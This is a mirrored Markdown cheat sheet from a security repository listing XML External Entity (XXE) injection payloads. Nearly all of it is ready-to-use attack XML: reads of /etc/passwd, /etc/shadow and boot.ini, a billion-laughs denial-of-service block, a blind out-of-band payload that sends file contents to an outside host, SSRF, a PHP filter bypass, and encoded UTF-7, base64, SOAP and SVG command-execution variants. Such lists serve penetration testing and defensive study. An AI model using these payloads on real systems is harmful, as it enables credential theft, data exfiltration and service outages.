mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-28 15:35:24 +00:00
142 lines
3.6 KiB
Markdown
142 lines
3.6 KiB
Markdown
# XML External Entity (XXE) Injection Payloads
|
|
|
|
* XXE : Classic XXE
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE data [
|
|
<!ELEMENT data (#ANY)>
|
|
<!ENTITY file SYSTEM "file:///etc/passwd">
|
|
]>
|
|
<data>&file;</data>
|
|
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
|
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
|
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
|
```
|
|
|
|
* XXE: Basic XML Example
|
|
```
|
|
<!--?xml version="1.0" ?-->
|
|
<userInfo>
|
|
<firstName>John</firstName>
|
|
<lastName>Doe</lastName>
|
|
</userInfo>
|
|
```
|
|
|
|
* XXE: Entity Example
|
|
```
|
|
<!--?xml version="1.0" ?-->
|
|
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
|
|
<userInfo>
|
|
<firstName>John</firstName>
|
|
<lastName>&example;</lastName>
|
|
</userInfo>
|
|
```
|
|
|
|
* XXE: File Disclosure
|
|
```
|
|
<!--?xml version="1.0" ?-->
|
|
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
|
|
<userInfo>
|
|
<firstName>John</firstName>
|
|
<lastName>&ent;</lastName>
|
|
</userInfo>
|
|
```
|
|
|
|
* XXE: Denial-of-Service Example
|
|
```
|
|
<!--?xml version="1.0" ?-->
|
|
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
|
|
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
|
|
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
|
|
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
|
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
|
|
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
|
|
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
|
|
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
|
|
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
|
|
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
|
|
<tag>&lol9;</tag>
|
|
```
|
|
|
|
* XXE: Local File Inclusion Example
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo (#ANY)>
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
|
|
```
|
|
|
|
* XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo (#ANY)>
|
|
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
|
|
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
|
|
```
|
|
|
|
* XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE foo [
|
|
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
|
|
<foo><result>∾</result></foo>
|
|
```
|
|
|
|
* XXE:SSRF ( Server Side Request Forgery ) Example
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo (#ANY)>
|
|
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
|
|
```
|
|
|
|
* XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
|
|
```
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE lolz [
|
|
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
|
|
<lolz><lol>3..2..1...&test<lol></lolz>
|
|
```
|
|
|
|
* XXE: UTF-7 Exmaple
|
|
```
|
|
<?xml version="1.0" encoding="UTF-7"?>
|
|
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
|
|
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
|
|
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
|
```
|
|
|
|
* XXE: Base64 Encoded
|
|
```
|
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
|
|
```
|
|
|
|
* XXE: XXE inside SOAP Example
|
|
```
|
|
<soap:Body>
|
|
<foo>
|
|
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
|
|
</foo>
|
|
</soap:Body>
|
|
```
|
|
|
|
* XXE: XXE inside SVG
|
|
```
|
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
|
|
<image xlink:href="expect://ls"></image>
|
|
</svg>
|
|
```
|